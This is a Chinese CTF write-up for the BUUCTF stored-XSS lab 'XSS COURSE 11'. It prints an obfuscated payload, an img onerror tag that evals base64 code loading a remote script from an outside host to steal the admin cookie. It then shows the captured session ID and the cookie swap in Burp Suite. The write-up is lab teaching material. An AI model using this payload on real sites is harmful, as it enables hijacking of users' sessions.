【BUUCTF】BUU XSS COURSE 11

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目

​​​​​​XSS安全平台

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvZXplIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

获取到了 cookie : PHPSESSID=37fe83cc4c3fe53c0686b2029c4cab43

后台路径 http://web/backend/admin.php

根据提示构造url并访问

4276ae11-be9b-4384-bfae-75839de9d1b2.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中改cookie值并放行

再次访问,最终得到flag

相关推荐
xixingzhe26 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
问君能有几多愁~6 小时前
C++ 数据结构复习笔记
数据结构·c++·笔记
r_oo_ki_e_7 小时前
Java Map 集合学习笔记
java·笔记·学习
中科岩创7 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
项目经理老王8 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
笨鸟先飞的橘猫8 小时前
skynet——sharetable学习
学习·skynet
liuyicenysabel9 小时前
大模型学习笔记 · 第八篇 · 进阶:偏好对齐与多卡训练
人工智能·笔记·学习
Funing711 小时前
FreeRTOS学习day1:Keil 工程配置与 FreeRTOS 链表机制理解
数据结构·学习·链表
心中有国也有家12 小时前
使用 DevEco Studio 配置 Flutter 鸿蒙签名
学习·flutter·华为·harmonyos
灯澜忆梦12 小时前
MySQL 完整学习路线
学习·mysql